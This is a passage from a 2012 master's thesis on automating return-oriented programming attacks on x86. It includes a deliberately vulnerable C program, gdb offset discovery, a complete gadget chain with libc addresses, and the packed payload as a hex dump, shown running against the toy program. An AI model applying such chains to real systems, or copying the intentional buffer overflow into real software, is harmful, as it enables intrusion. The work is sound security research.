AUTOMATING RETURN ORIENTED ATTACKS
ON x86 ARCHITECTURE
School of Computer and Communication Sciences
Programming Methods Group
École Polytechnique Fédérale de Lausanne
A degree project submitted in partial fulfilment of the requirements for the degree of Master of Computer Science of
Alen Stojanov
supervised by:
Prof. Dr. Martin Odersky
Prof. Dr. Michael Franz
Lausanne, EPFL, 2012
Acknowledgements
I would like to express my utmost gratitude to my external thesis advisor, Prof. Dr. Michael Franz, for allowing me to join his team in the Secure Systems and Software Laboratory at the University of California, Irvine, for his expertise and kindness, and most of all for ensuring a positive and encouraging environment for performing research.
This work would not have been completed without help and support.
I am greatly indebted to Dr. Per Larsen and Dr. Stefan Brunthaler for their trust in me and for providing me with the opportunity to acquire the knowledge and expertise needed to contribute to the research project. Gaining their trust and friendship made my work so much smoother.
I would like to express my appreciation to Prof. Dr. Martin Odersky for giving me the opportunity to participate in this research project, as well as for being my internal supervisor at EPFL.
Lausanne, 16 March 2012 A. S.
Abstract
Return oriented programming (ROP) is an exploit technique which avoids code injec-
tion by reusing existing code to induce arbitrary behavior in a program. ROP attacks
are conducted by chaining available instruction sequences (gadgets) ending in a “re-
turn” instruction. While the construction of ROP attacks has been automated, these
approaches rely on searching gadgets using predefined sequences which operate on a
fixed set of registers, on the grounds that large and widely distributed chunks of binary
code are likely to contain them. As a result, libraries and operating system kernels
have been targeted as gadget providers.
We propose automatic gadget construction targeting stand-alone executables, without relying on libraries or the system kernel. Because the pool of available gadgets is limited, the instructions found in a stand-alone executable are likely to operate on distinct registers. Consequently, chaining instructions so that the result of one instruction is used by the following ones can be achieved only by moving data across registers. For that purpose, we build a graph representing register manipulation instruction sequences (mov, xchg, add, sub, etc.). Each register represents a node, and each data movement across registers represents an edge. The strongly connected components in the graph provide the available registers, and the shortest paths among those registers describe instruction chaining with minimal data movements. Customizing the gadget search to the available registers increases the flexibility when automatically constructing attacks, allowing the attacks to be applied to stand-alone executables, and minimal data movements help optimize the generated attacks.
Contents
Acknowledgements
Abstract
1 Introduction
1.1 Thesis outline
2 Background
2.1 Return Oriented Programming (x86)
2.1.1 Intended and Unintended Instructions
2.1.2 Return Oriented Programming Attack: Fibonacci Sequence
2.2 Jump Oriented Programming
2.3 Architectural aspects
2.4 Defence Techniques
2.4.1 W⊗X and ASLR
2.4.2 Return-Less Kernels
2.4.3 HyperCrop
2.4.4 ROPdefender
2.4.5 G-Free
2.4.6 Control Flow Integrity
3 Related Work
3.1 Q
3.2 Return Into libc Attacks
3.3 Reverse Engineering Intermediate Language
3.4 Return Oriented Rootkits
4 Automatic Return Oriented Programming
4.1 Process Image Analysis
4.2 Gadget Locations
4.3 Considering Gadget Side-Effects
4.4 Gadget Classification
4.5 Building the Register Transfer Graph
4.5.1 Register Clobbering Edges
4.5.2 Memory Transfer Nodes
4.6 Discovering Register Candidates
4.7 Encapsulation
5 Evaluation
6 Conclusion
6.1 Contribution
6.2 Future Work
Bibliography
1 Introduction
Software flaws or vulnerabilities are frequently the underlying causes of information security incidents. The constantly evolving world of software increases the complexity of deployed applications, and consequently it becomes increasingly difficult to guarantee that a piece of software is free of bugs. The fundamental security issues arise at software vendors that follow the policy of “sell today and fix it tomorrow”, dictated by the need to launch products before competitors do. Producing software that contains unintentional bugs and flaws is therefore almost inevitable. Various parties, such as hackers, security firms and academic researchers, are interested in finding flaws in other vendors’ software and in creating novel attack techniques to exploit the identified flaws.
Return-oriented programming (ROP) is an attack technique that exploits software vulnerabilities. It emerged from community work and later moved into the academic world, where it was first published by Hovav Shacham [1]. The technique is used to induce arbitrary behaviour in a program whose control flow has been diverted, without injecting any code. The threat of ROP attacks is present across many architectures, including x86, ARM, SPARC, Atmel AVR and PowerPC [1, 2, 3, 4, 5]. As a result, many everyday devices are affected, including smartphones and tablets running on the ARM architecture, and even voting machines [6] used in past elections.
The popularity of ROP is mainly based on its ability to bypass almost all widely deployed protection mechanisms, such as W⊗X and ASLR [7, 8, 9]. Current defence techniques either introduce excessive performance overhead, detect or protect against ROP only in a very constrained environment, or are simply not deployed on the systems they are designed to protect [10, 11, 12, 13, 14, 15]. Meanwhile, many techniques are being developed to automate ROP attack generation [16, 17, 18, 19]. Most of them target shared libraries or operating system kernels, which provide a large pool of reusable chunks of binary code (gadgets). The automation depends on matching a predefined set of template instructions operating on a fixed set of CPU registers.
The focus of this thesis is on stand-alone executables, where the availability of reusable code is significantly reduced by the small size of the binary. As a result, generating code reuse attacks on stand-alone binaries is quite tedious, even when done manually. Our system automates the creation of ROP attacks by:
• Automatically extracting gadgets from a target binary
• Carefully considering the side effects introduced by the execution of each gadget
• Analysing the data transfer between registers and memory
• Automatically chaining gadgets using the data transfer relations between the CPU registers and memory
Finally, we analyse a set of popular applications available across different Linux distributions, and show that the automatic creation of ROP attacks is possible and directly dependent on the size of the target binary.
1.1 Thesis outline
The rest of the thesis is organized as follows:
• Chapter 2 gives a detailed explanation of the fundamentals of code reuse attacks, their evolution and variations, walks through the construction of a practical attack, and discusses the limitations of current defence mechanisms.
• Chapter 3 reviews related work.
• Chapter 4 defines the contribution of this project, elaborating on the mechanisms used to automate the generation of return oriented attacks.
• Chapter 5 presents the results obtained using the system to generate automatic return oriented attacks, provides a comparison with other systems and evaluates the level of automation achieved on a variety of stand-alone executables.
• Finally, the conclusion and future work ideas are covered in Chapter 6.
2 Background
Building software that provides an adequate level of security assurance becomes increasingly challenging as the size and complexity of software grow. Developers are burdened not only with delivering a correct and optimal solution to a problem, but also with protecting against every relevant potential vulnerability. Attackers, in contrast, often have to find and exploit only a single exposed vulnerability.
The traditional vulnerabilities are buffer overflows on the stack [20], buffer overflows on the heap [21], integer overflows [22] and format string vulnerabilities [23]. The techniques to exploit them vary per architecture and operating system. Return oriented programming is a technique that uses an existing vulnerability to create arbitrary attacks and that applies to many widely deployed architectures. An attacker using this technique must accomplish two tasks: subvert the program’s control flow from its normal course, and force the program to act in the manner of the attacker’s choosing. In the following, we concentrate on the classical stack-smashing vulnerabilities and describe the fundamentals of this technique.
2.1 Return Oriented Programming (x86)
Return oriented programming (ROP) is a technique to force computers to behave maliciously without injecting malicious code into the system. Assuming that a vulnerability is discovered in a particular program, an attacker is able to subvert the program control from its normal course by indirectly executing cherry-picked machine instructions, or groups of machine instructions, already present in the program. As a result, the technique circumvents most widely deployed measures that try to prevent execution originating from user-controlled memory [7].
The very first academic work describing the technique of return oriented programming was Hovav Shacham’s “The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86)” [1]. However, the idea of code reuse attacks had been circulating on mailing lists, forums and in computer security magazines long before it was acknowledged by the academic world. Inspired by the discovery of the buffer overflow vulnerability, the technique improved over time, as shown in the retrospective timeline below.
1972 • First publication on buffer overflow attacks [24]
1988 • The “Morris” worm released [25]
1995 • Initial rediscovery of buffer overflow attacks [26]
1996 • Step-by-step introduction to exploiting stack-based buffer overflows [20]
1997 • Non-executable stack patches are defeated [27]
1997 • “Instruction chaining” first introduced on BugTraq [28]
1999 • Return to lib(c) is introduced on Solaris / SPARC [29]
2000 • Community discussion on code reuse techniques [30]
2001 • Advanced attacks using return to lib(c) are introduced [31]
2001 • Code Red worm infects more than 300,000 PCs, using code reuse techniques [32]
2005 • Exploitation on x86-64 using borrowed code chunks [33]
2007 • Return Oriented Programming by Hovav Shacham [1]
2008 • ROP attacks on Harvard-architecture devices [4]
2008 • Router exploitation using ROP on PowerPC architecture [5]
2008 • Generalization of ROP attacks on RISC [2]
2009 • REIL return oriented programming on ARM [3]
2009 • Exploiting AVC voting machines [6]
2009 • Rootkits for the Windows kernel using ROP [19]
2010 • Framework for automated architecture independent search [18]
2010 • Return Oriented Programming without returns [34]
2010 • Corelan releases pvefindaddr to simplify the exploit building process
2011 • Jump Oriented Programming defined [35]
2011 • Advanced techniques: packed, printable, and polymorphic ROP [36]
2011 • Cross-architectural ROP attacks by libc function chaining [17]
To illustrate the essence of a return oriented attack, we assume that the target is a Linux binary with a stack buffer overflow vulnerability, as mentioned above. As soon as the binary is loaded by the operating system, it becomes a Linux process with the corresponding libraries mapped into memory. The text segment of the process, as well as the memory mapped regions, contain chunks of binary code. Once the vulnerability of the program is exploited, we assume that the return address on the stack is overwritten. If the overwritten address points to a valid machine instruction that resides in one of the sections containing binary code, the control flow of the program is subverted to sequentially execute the instructions starting at that address. If this instruction sequence ends with a return instruction, the control flow is subverted again, to the next address available on the stack. We call such an instruction sequence a gadget.
Figure 2.1: Simplified jail-break attack using ROP. Gadgets are located in the executable memory segments of the process (text segment and memory mapping). The stack holds the gadget addresses 0x00555A08, 0x00212508, 0x00ABCD00, 0x00777700 and 0x00919100; executing them in this order sets EAX to “white”, sets EBX to “mouse”, changes EBX to “house”, concatenates both into EAX as “whitehouse”, and opens a connection to whitehouse.
By carefully arranging addresses on the stack, chosen from the gadgets available in the target, the attacker can induce arbitrary behaviour in the system. Figure 2.1 illustrates a simplified jail-break ROP attack on a Linux binary. It is easy to see how harmless and common instruction sequences can modify the state of the application to cause malevolent behaviour.
2.1.1 Intended and Unintended Instructions
The x86 architecture has a variable instruction length, ranging from 1 byte to 15 bytes per instruction, and enforces no alignment on binary code. The CPU is therefore able to fetch binary code at any location in memory and execute it, provided the bytes at that location represent valid x86 instructions. For example, consider the following instruction:
8d bc 31 d6 07 37 c3    lea -0x3cc8f82a(%ecx,%esi,1), %edi
If we disregard the first two bytes and start decoding from the third byte, we get a completely different sequence of instructions:
31 d6    xor %edx, %esi
07       pop %es
37       aaa
c3       ret
As a result, we distinguish two sets of instructions: intended and unintended instructions [37]. Since we are interested in instruction sequences ending with a return instruction, encoded by the byte c3 or c2, any unintended sequence ending with one of those bytes can be considered a candidate for a ROP attack, if it decodes to valid x86 instructions. How often such sequences occur depends on the characteristics of the machine language in question, which Shacham [1] calls the geometry of the language, claiming that ‘in any sufficiently large body of x86 executable code there will exist sufficiently many useful code sequences to cause the exploited program to undertake arbitrary computation’.
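The first half of such a search can be sketched in a few lines of C. This is only an illustration under stated assumptions: the function names and the max_back window are hypothetical, and the decoding step that decides whether the bytes before a return opcode form valid instructions is deliberately left out (a c2 byte, in addition, only encodes a return when it is followed by a 16-bit immediate).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Returns 1 if the byte is a near-return opcode: c3 (ret) or c2 (ret imm16). */
static int is_ret_opcode(uint8_t b)
{
    return b == 0xc3 || b == 0xc2;
}

/*
 * Scans code[0..len) for return opcodes and, for each one found, records every
 * start offset within max_back bytes before it. Each (start, ret) pair is only
 * a candidate: a real gadget finder would still decode the bytes in between
 * and keep the pair only if they form valid x86 instructions.
 * Returns the number of candidates written to starts/rets (at most cap).
 */
static size_t find_candidates(const uint8_t *code, size_t len, size_t max_back,
                              size_t *starts, size_t *rets, size_t cap)
{
    assert(code != NULL && starts != NULL && rets != NULL);
    size_t n = 0;
    for (size_t r = 0; r < len; r++) {
        if (!is_ret_opcode(code[r]))
            continue;
        size_t lo = (r > max_back) ? r - max_back : 0;
        for (size_t s = lo; s < r && n < cap; s++) {
            starts[n] = s;
            rets[n] = r;
            n++;
        }
    }
    return n;
}

/* The lea instruction from the text: 8d bc 31 d6 07 37 c3. */
static const uint8_t LEA_EXAMPLE[] = { 0x8d, 0xbc, 0x31, 0xd6, 0x07, 0x37, 0xc3 };
```

Applied to LEA_EXAMPLE with a window of four bytes, the scan reports the return opcode at offset 6 and, among its candidates, the start offset 2, which is the unintended sequence shown above.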
2.1.2 Return Oriented Programming Attack: Fibonacci Sequence
To illustrate a practical ROP attack, we use a dummy program that has a buffer overflow bug. The source of the program, dummy.c, is the following:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>   /* declares read() */

int main(int argc, char *argv[])
{
    unsigned char buf[1];
    /* Deliberate bug: up to 2048 bytes are read into a 1-byte stack buffer. */
    read(0, buf, 2048);
    printf("%c\n", buf[0]);
    return 0;
}
Any input longer than 1 character overflows the buffer and can lead to a segmentation fault. The program is compiled with gcc 4.4.5-8 on Debian 5.0 (x86), and linked with libc 2.11-1:
astojanov@debian-vbox:~/workspace/fROP$ ldd dummy
        linux-gate.so.1 => (0xb7fe4000)
        libc.so.6 => /lib/i686/cmov/libc.so.6 (0xb7e97000)
        /lib/ld-linux.so.2 (0xb7fe5000)
This means that we can use the gadgets available in the binary, as well as the gadgets in the linked libc. Before the ROP attack is crafted, we need to calculate the offset on the stack where the return address resides. Note that the offset varies between distributions and compilers. The offset is determined experimentally using gdb, by feeding the dummy program inputs of different lengths. We start with 7 ’x’ characters:
(gdb) file dummy
Reading symbols from dummy...(no debugging symbols found)...done.
(gdb) run
Starting program: dummy
xxxxxxx
x
Program exited normally.
The listing above shows that 7 bytes are not enough to overwrite the return address. Therefore we repeat the same process with 15 input characters:
(gdb) run
Starting program: dummy
xxxxxxxxxxxxxxx
x
Program received signal SIGSEGV, Segmentation fault.
0xb70a7878 in ?? ()
In this case, the program fails with a segmentation fault as a result of the overwritten return address. The return address consists of 32 bits, and we can see that its 2 low-order bytes are overwritten with the ASCII code of the ’x’ character, which is 0x78; the following byte, 0x0a, is the newline that terminates the input. Thus, we can conclude that the stack offset to the return address is 13 bytes. To implement the logic of the Fibonacci sequence, the first step is to find the available gadgets. We use a modified version of the Galileo algorithm [1], looking for c3 and c2 bytes and backtracking from those bytes to find valid x86 instructions. Similarly, pop reg followed by jmp reg instructions are also considered, since the combination of those instructions is equivalent to a return instruction. The search yielded 18419 gadgets from the binary and the corresponding linked libraries (libc and linux-gate).
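The offset reasoning above can be written down as a small calculation. The sketch below is an illustration, not part of the original tooling; the function names are hypothetical, and it assumes the filler bytes are the last bytes of the input before the newline and that they only partially overwrite the return address (one to three bytes).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Counts how many low-order bytes of a faulting 32-bit return address equal
 * the fill byte. x86 is little-endian, so the low-order byte of the address
 * is the first byte of the saved return address in memory.
 */
static unsigned overwritten_fill_bytes(uint32_t fault_addr, uint8_t fill)
{
    unsigned count = 0;
    while (count < 4 && ((fault_addr >> (8 * count)) & 0xffu) == fill)
        count++;
    return count;
}

/* Offset of the saved return address: fill bytes sent minus those that landed in it. */
static size_t return_address_offset(size_t fill_len, uint32_t fault_addr, uint8_t fill)
{
    unsigned hit = overwritten_fill_bytes(fault_addr, fill);
    assert(hit <= fill_len);
    return fill_len - hit;
}
```

For the gdb session above, 15 filler bytes and the faulting address 0xb70a7878 give 15 - 2 = 13.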
The first observation about the obtained gadgets concerns the pop gadgets. The pop instruction pops an element from the stack, increasing the value of esp. Since values are placed on the stack when crafting a ROP attack, each use of the pop instruction loads the register with the next value on the stack, as illustrated in Figure 2.2. This type of gadget can therefore be used to initialize register values.
pop %edi
return
Figure 2.2: pop gadgets used for initialization
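A toy model makes the stack consumption of a pop gadget explicit. The struct and function names below are hypothetical, and the stack is modelled as an array of 32-bit words indexed by a counter instead of a real esp.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Toy machine state: one register plus an index standing in for esp. */
struct toy_cpu {
    uint32_t edi;
    size_t   sp;   /* index of the next stack word to be popped */
};

/* Models "pop %edi": load the word on top of the stack, then advance esp. */
static void toy_pop_edi(struct toy_cpu *cpu, const uint32_t *stack, size_t words)
{
    assert(cpu->sp < words);
    cpu->edi = stack[cpu->sp];
    cpu->sp += 1;  /* esp += 4 on the real machine */
}

/* Models "ret": pop the next word and return it as the new instruction pointer. */
static uint32_t toy_ret(struct toy_cpu *cpu, const uint32_t *stack, size_t words)
{
    assert(cpu->sp < words);
    return stack[cpu->sp++];
}
```

With the stack words { 1, address of the next gadget }, toy_pop_edi loads 1 into edi and toy_ret then transfers control to the next gadget, which is why a data word always follows the address of a pop gadget in the chain.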
In our Fibonacci attack, registers edx and edi hold the numbers Fn and Fn+1 of the Fibonacci sequence (both are initialized with the value 1, as positions 02 and 04 show). The attack is presented descriptively: each line gives the sequential position of the entry, the address of the gadget, the hex bytes of that gadget, and the assembly translation of those bytes:
01: 0xB7F6E16D: hexa:"5a |c3" text:"pop %edx ; ret"
02: 0x00000001
03: 0xB7F4CD28: hexa:"5f |c3" text:"pop %edi ; ret"
04: 0x00000001
ecx is used to track the position in the sequence. We initialize it with the value 10, to calculate the 10th Fibonacci number, and decrement it twice, since we already have the first two numbers (ebx is initialized with a junk value):
05: 0xB7F6E197: hexa:"59 |5b |c3" text:"pop %ecx ; pop %ebx ; ret"
06: 0x0000000A
07: 0xDEADBEEF
08: 0xB7F5D116: hexa:"ff c9 |c3" text:"dec %ecx ; ret"
09: 0xB7F5D116: hexa:"ff c9 |c3" text:"dec %ecx ; ret"
We now start the loop. In order to use the gadget at position #13, we must ensure that its instruction incl 0x5D5B14C4(%ebx) writes to a writable region of the process memory. We therefore initialize ebx with the value 0x62A4E2D4, so that the gadget at position #13 increments the value at address 0x62A4E2D4 + 0x5D5B14C4 = 0xBFFFF798.
10: 0xB7F6E198: hexa:"5b |c3" text:"pop %ebx ; ret"
11: 0x62A4E2D4
The next 3 gadgets perform the “Fibonacci magic”. esi serves as a temporary variable, and we have: esi = edx, edx = edi and finally edi = edi + esi.
12: 0xB7F0964F: hexa:"89 d6 |c3" text:"mov %edx, %esi ; ret"
13: 0xB7F9E479: hexa:"89 fa |ff 83 c4 14 5b 5d |c3"
    text:"mov %edi, %edx ; incl 0x5D5B14C4(%ebx) ; ret"
14: 0xB7EBFF62: hexa:"01 f7 |c2 00 00" text:"add %esi, %edi ; ret"
Conditional branching is one of the most challenging parts of ROP. To implement it, we use the carry flag (CF). This flag is updated by arithmetic instructions; in particular, a subtraction a − b sets CF when it requires a borrow, that is, when a < b for unsigned operands. We can therefore use the flag to determine whether a < b. In this context, the value of ecx is compared with 1:
15: 0xB7F61F8B: hexa:"91 |c2 00 00" text:"xchg %ecx, %eax ; ret"
16: 0xB7F6131A: hexa:"83 e8 01 |c3" text:"sub $0x01, %eax ; ret"
17: 0xB7F61F8B: hexa:"91 |c2 00 00" text:"xchg %ecx, %eax ; ret"
Once CF has been set or cleared by the subtraction, lahf is used to load the flags into ah, with CF in the least significant bit of ah.
18: 0xB7F5CD5D: hexa:"9f |c3" text:"lahf ; ret"
CF is now bit 8 of eax. We therefore mask that bit and shift eax 2 bits to the right, so that eax becomes 0 or 64, according to the value of CF.
19: 0xB7F65659: hexa:"25 00 01 00 00 |c3" text:"and $0x100,%eax ; ret"
20: 0xB7EF5D47: hexa:"c1 f8 02 |c3" text:"sar $0x02, %eax ; ret"
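The flag extraction performed by positions 16 to 20 can be modelled as follows. This is a sketch with a hypothetical function name; it models only CF and the always-set bit 1 of the flags byte, since every other bit is discarded by the and instruction.

```c
#include <assert.h>
#include <stdint.h>

/*
 * Models gadgets 16-20 for a given counter value:
 *   sub $1, %eax  -> CF is set when the unsigned subtraction borrows (value < 1)
 *   lahf          -> AH = SF:ZF:0:AF:0:PF:1:CF, so CF becomes bit 8 of eax
 *   and $0x100    -> keep only that bit
 *   sar $2        -> 0x100 >> 2 = 64, or 0 if CF was clear
 */
static uint32_t branch_offset(uint32_t counter)
{
    uint32_t cf = (counter < 1u) ? 1u : 0u;  /* borrow out of counter - 1 */
    uint32_t ah = 0x02u | cf;                /* lahf: reserved bit 1 plus CF */
    uint32_t eax = ah << 8;                  /* other bits of eax are masked next */
    eax &= 0x100u;
    eax >>= 2;   /* sar on a non-negative value equals a logical shift */
    return eax;
}
```

The result is 64 only when the counter was already 0 before the subtraction; for every counter value of 1 or more it is 0.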
In order to perform the conditional jump, we use the value of eax to modify esp. Since eax holds either 64 or 0, we can add eax to esp. This results in either continuing with the next gadget address on the stack, or with the address 64/4 = 16 positions later. However, esp cannot be modified directly, and we need 5 gadgets to set its value. We take this into consideration and offset esp by five 32-bit words via ebx. Note that esp is added into ebp at position #25, so that ebp receives the value of esp at that point in the chain.
21: 0xB7F82DD3: hexa:"5d |c3" text:"pop %ebp ; ret"
22: 0x00000000
23: 0xB7F6E198: hexa:"5b |c3" text:"pop %ebx ; ret"
24: 0x00000014
25: 0xB7F3CBC2: hexa:"03 ec |c3" text:"add %esp, %ebp ; ret"
26: 0xb7ff5e6a: hexa:"01 eb |c3" text:"add %ebp, %ebx ; ret"
27: 0xB7F61F8B: hexa:"91 |c2 00 00" text:"xchg %ecx, %eax ; ret"
28: 0xB7F60B8C: hexa:"01 d9 |c3" text:"add %ebx, %ecx ; ret"
29: 0xB7F61F8B: hexa:"91 |c2 00 00" text:"xchg %ecx, %eax ; ret"
30: 0xB7FCD854: hexa:"94 |c2 00 00" text:"xchg %esp, %eax ; ret"
If the control flow of the attack reaches position #31, CF was 0 at position #16. This means that our representation of the number N, which is decremented on every iteration (positions 15-17), was greater than or equal to 1 before the decrement, so we need to jump back to the start of the loop at position #10. Note that ebx still holds the value of esp+0x14 obtained at position #26. We therefore need to move esp back by 16 positions and additionally subtract the offset of 0x14, that is, 16 · 4 + 0x14 = 84 (0x54). We load 0x54 into eax, negate it, and use the same trick to modify the value of esp.
31: 0xB7F64321: hexa:"58 |c3" text:"pop %eax ; ret"
32: 0x00000054
33: 0xB7F9E996: hexa:"f7 d8 |c3" text:"neg %eax ; ret"
34: 0xB7F61F8B: hexa:"91 |c2 00 00" text:"xchg %ecx, %eax ; ret"
35: 0xB7F60B8C: hexa:"01 d9 |c3" text:"add %ebx, %ecx ; ret"
36: 0xB7F61F8B: hexa:"91 |c2 00 00" text:"xchg %ecx, %eax ; ret"
37: 0xB7FCD854: hexa:"94 |c2 00 00" text:"xchg %esp, %eax ; ret"
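The stack-pointer arithmetic of both branches can be checked with a short calculation. The sketch below is illustrative: the function names and the base address are hypothetical, and each chain position is taken to be one 32-bit word, with position 1 located at base.

```c
#include <assert.h>
#include <stdint.h>

enum { WORD = 4 };  /* each chain position is one 32-bit stack word */

/* Byte address of chain position pos, for a chain whose position 1 lies at base. */
static uint32_t addr_of(uint32_t base, unsigned pos)
{
    assert(pos >= 1);
    return base + (uint32_t)(pos - 1) * WORD;
}

/*
 * Forward branch (positions 21-30). When the gadget at position 25 runs, its
 * own address has already been popped, so esp points at position 26.
 */
static uint32_t forward_target(uint32_t base, uint32_t eax /* 0 or 64 */)
{
    uint32_t ebp = 0 + addr_of(base, 26);  /* pop %ebp (0); add %esp, %ebp */
    uint32_t ebx = 0x14 + ebp;             /* pop %ebx (0x14); add %ebp, %ebx */
    return ebx + eax;                      /* value finally exchanged into esp */
}

/* Backward branch (positions 31-37): ebx is unchanged, eax = -0x54. */
static uint32_t backward_target(uint32_t base)
{
    uint32_t ebx = 0x14 + addr_of(base, 26);
    uint32_t eax = (uint32_t)0 - 0x54u;    /* neg %eax, two's complement */
    return ebx + eax;
}
```

Under these assumptions, the forward branch lands on position 31 for eax = 0 and on position 47 for eax = 64, and the backward branch lands on position 10, 21 words (84 bytes) before position 31.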
Since the control flow jumps ahead by either 0 or 16 positions, esp will never point to this part of the stack. It is therefore free space, and we can use it to store a message that is displayed on the screen once the Fibonacci computation has completed.
38: 0x6f626946: "Fibo"
39: 0x6363616e: "nacc"
40: 0x6f642069: "i do"
41: 0x202e656e: "ne. "
42: 0x206e7552: "Run "
43: 0x6f686365: "echo"
44: 0x0a3f2420: " $?\n"
45: 0x00000000: ""
46: 0x00000000:
If position #47 is reached, N is 0 and we are done with the Fibonacci sequence. The last thing left is to report the result. First, we invoke the sys_write system call to inform the user that the calculation of the Fibonacci number has completed.
In order to print on the screen using the system call, ecx is set to the address of position #38, ebx is set to 1 (so that it writes to the standard output) and edx is set to 29 (0x1d), the size of the string being written. eax must be set to 4, the number of the write system call.
47: 0xB7F6E197: hexa:"59 |5b |c3" text:"pop %ecx ; pop %ebx ; ret"
48: 0x00000030
49: 0x00000000
50: 0xb7ff5e6a: hexa:"01 eb |c3" text:"add %ebp, %ebx ; ret"
51: 0xB7F60B8C: hexa:"01 d9 |c3" text:"add %ebx, %ecx ; ret"
52: 0xB7F4C31E: hexa:"5b |c3" text:"pop %ebx ; ret"
53: 0x00000001
54: 0xB7F6E16D: hexa:"5a |c3" text:"pop %edx ; ret"
55: 0x0000001d
56: 0xB7F64321: hexa:"58 |c3" text:"pop %eax ; ret"
57: 0x00000004
58: 0xb7fe3830: hexa:"cd 80 |c3" text:"int $0x80 ; ret"
Finally, we transfer the value of edi (the n-th Fibonacci number) into ebx and return it as the exit code of the program, using a system call again.
59: 0xB7F6E198: hexa:"5b |c3" text:"pop %ebx ; ret"
60: 0x62A4E2D4
61: 0xB7F9E479: hexa:"89 fa |ff 83 c4 14 5b 5d |c3"
    text:"mov %edi, %edx ; incl 0x5D5B14C4(%ebx) ; ret"
62: 0xB7F518C2: hexa:"89 d3 |c3" text:"mov %edx, %ebx ; ret"
63: 0xb7ff8efc: hexa:"31 c0 |c3" text:"xor %eax, %eax ; ret"
64: 0xb7fe82c3: hexa:"40 |c3" text:"inc %eax ; ret"
65: 0xb7fe3830: hexa:"cd 80 |c3" text:"int $0x80 ; ret"
Once the addresses are taken into consideration, and the rest of the description in terms of bytes and text is stripped, the binary payload looks as follows (generated by the bvi viewer):
00000000 78 78 78 78 78 78 78 78 78 78 78 78 78 6D E1 F6 xxxxxxxxxxxxxm..
00000010 B7 01 00 00 00 28 CD F4 B7 01 00 00 00 97 E1 F6 .....(..........
00000020 B7 0A 00 00 00 EF BE AD DE 16 D1 F5 B7 16 D1 F5 ................
00000030 B7 98 E1 F6 B7 D4 E2 A4 62 4F 96 F0 B7 79 E4 F9 ........bO...y..
00000040 B7 62 FF EB B7 8B 1F F6 B7 1A 13 F6 B7 8B 1F F6 .b..............
00000050 B7 5D CD F5 B7 59 56 F6 B7 47 5D EF B7 D3 2D F8 .]...YV..G]...-.
00000060 B7 00 00 00 00 98 E1 F6 B7 14 00 00 00 C2 CB F3 ................
00000070 B7 6A 5E FF B7 8B 1F F6 B7 8C 0B F6 B7 8B 1F F6 .j^.............
00000080 B7 54 D8 FC B7 21 43 F6 B7 54 00 00 00 96 E9 F9 .T...!C..T......
00000090 B7 8B 1F F6 B7 8C 0B F6 B7 8B 1F F6 B7 54 D8 FC .............T..
000000A0 B7 46 69 62 6F 6E 61 63 63 69 20 64 6F 6E 65 2E .Fibonacci done.
000000B0 20 52 75 6E 20 65 63 68 6F 20 24 3F 0A 00 00 00  Run echo $?....
000000C0 00 00 00 00 00 97 E1 F6 B7 30 00 00 00 00 00 00 .........0......
000000D0 00 6A 5E FF B7 8C 0B F6 B7 1E C3 F4 B7 01 00 00 .j^.............
000000E0 00 6D E1 F6 B7 1D 00 00 00 21 43 F6 B7 04 00 00 .m.......!C.....
000000F0 00 30 38 FE B7 98 E1 F6 B7 D4 E2 A4 62 79 E4 F9 .08.........by..
00000100 B7 C2 18 F5 B7 FC 8E FF B7 C3 82 FE B7 30 38 FE .............08.
00000110 B7 .
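The serialization step can be sketched as follows: 13 filler bytes, followed by each chain word in little-endian byte order. The function name and buffer handling are hypothetical and not taken from the original tooling; only the first four chain positions are included here.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * Writes pad_len filler bytes followed by the chain words in little-endian
 * byte order, as x86 expects them on the stack. Returns the payload length,
 * or 0 if the output buffer is too small.
 */
static size_t pack_payload(uint8_t *out, size_t cap, size_t pad_len, uint8_t filler,
                           const uint32_t *words, size_t nwords)
{
    assert(out != NULL && words != NULL);
    size_t total = pad_len + 4 * nwords;
    if (total > cap)
        return 0;
    memset(out, filler, pad_len);
    for (size_t i = 0; i < nwords; i++) {
        uint8_t *p = out + pad_len + 4 * i;
        p[0] = (uint8_t)(words[i] & 0xff);
        p[1] = (uint8_t)((words[i] >> 8) & 0xff);
        p[2] = (uint8_t)((words[i] >> 16) & 0xff);
        p[3] = (uint8_t)((words[i] >> 24) & 0xff);
    }
    return total;
}

/* First four chain positions from the text. */
static const uint32_t CHAIN_HEAD[] = {
    0xB7F6E16Du,  /* 01: pop %edx ; ret */
    0x00000001u,  /* 02: value for edx  */
    0xB7F4CD28u,  /* 03: pop %edi ; ret */
    0x00000001u,  /* 04: value for edi  */
};
```

Packing CHAIN_HEAD with 13 filler bytes reproduces the start of the dump, 6D E1 F6 B7 01 00 00 00 28 CD F4 B7 from offset 0x0D onwards. With all 65 positions, the length would be 13 + 65 · 4 = 273 bytes (0x111), which matches the size of the dump.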
When the payload is used as an input to the dummy program, the following results are obtained:
astojanov@debian-vbox:~/workspace/fROP$ ./dummy < payload.bin
x
Fibonacci done. Run echo $?
astojanov@debian-vbox:~/workspace/fROP$ echo $?
89
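The exit code can be cross-checked with a register-level model of the chain in plain C. This is a sketch with a hypothetical function name; gadget side effects that do not influence the result (the incl at position 13, the junk value in ebx) are left out, and the stack-pointer manipulation is replaced by an ordinary loop.

```c
#include <assert.h>
#include <stdint.h>

/* Register-level model of the chain for a requested index n (position 06). */
static uint32_t rop_fibonacci(uint32_t n)
{
    assert(n >= 2);
    uint32_t edx = 1, edi = 1;  /* positions 01-04 */
    uint32_t ecx = n - 2;       /* positions 05-09: pop, then two dec */
    uint32_t esi;

    for (;;) {
        esi = edx;              /* 12: mov %edx, %esi */
        edx = edi;              /* 13: mov %edi, %edx */
        edi += esi;             /* 14: add %esi, %edi */

        int cf = (ecx < 1u);    /* 16: sub $1 borrows only when ecx is 0 */
        ecx -= 1u;
        if (cf)
            break;              /* CF set: continue at position 47 */
    }
    return edi & 0xffu;         /* the exit status keeps the low 8 bits */
}
```

For n = 10 the loop body runs nine times, starting from edx = edi = 1, and leaves 89 in edi, in agreement with the output of echo $? above.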
2.2 Jump Oriented Programming
